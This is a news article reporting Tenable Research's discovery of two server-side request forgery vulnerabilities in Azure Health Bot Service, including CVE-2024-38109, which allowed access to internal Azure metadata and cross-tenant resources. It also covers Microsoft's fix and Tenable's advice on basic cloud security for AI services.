The Tenable Research reveals that two vulnerabilities were discovered in the Azure Health Bot Service that can be taken advantage of to gain access to cross-tenant resources such as user and client data.
The Azure Health Bot Service is a web-based system that was created for use in medical care. Programmers can utilize Azure Health Bot to create and have AI-driven, HIPAA-compliant, talking virtual assistants to enhance performance and minimize expenses. Virtual assistants could be designed for particular healthcare requirements and can manage administrative jobs or even triage to lessen the load of employees.
Subject to the settings of these chatbots, they could get access to sensitive patient data, therefore if there are vulnerabilities, that data might be in jeopardy. Possibly, vulnerabilities can be taken advantage of to access other resources. Tenable researchers carried out a review of the Azure Health Bot Service to determine possible security problems, and one of the characteristics looked into was the Data Connections element. Data Connections enable chatbots to connect to and pull information from outside sources, for example, patient sites to get patient data and reference directories for general medical data.
This function enables the service’s backend to ask for third-party APIs. The analysts examined this function to verify if it could connect endpoints inside the service. Microsoft had enforced steps to avoid this, however, the researchers could avoid those mitigations by giving redirect answers from user-supplied endpoints.
The vulnerability CVE-2024-38109 with a CVSS score of 9.1 is a critical server-side request forgery vulnerability that could be taken advantage of by an authenticated threat actor to raise privileges. The researchers showed that it’s possible to gain access to the service’s internal metadata service (IMDS) and get tokens that permit the management of cross-tenant assets of clients utilizing the Health Bot service.
The other vulnerability was discovered in the FHIR data connection endpoints’ validator mechanism that is employed inside Azure Health Bot. These likewise improperly managed to redirect replies from user-provided endpoints. The researchers took advantage of the vulnerability to gain access to Azure’s WireServer and parts of the internal AKS framework.
Microsoft received a report about the two vulnerabilities and fixed both in one week by changing a setting that makes certain redirect status codes declined for information connection endpoints. Clients of Azure Health Bot Service need not do anything. According to Microsoft, the vulnerabilities were not yet exploited openly.
Tenable remarks that these vulnerabilities aren’t found in the AI models, they impact the primary AI chatbot structure, and state the intelligent way of protecting the AI attack surface is to concentrate on standard, foundational cyber health and well-proven procedures, like applying conventional web app and cloud security systems for AI-powered resources.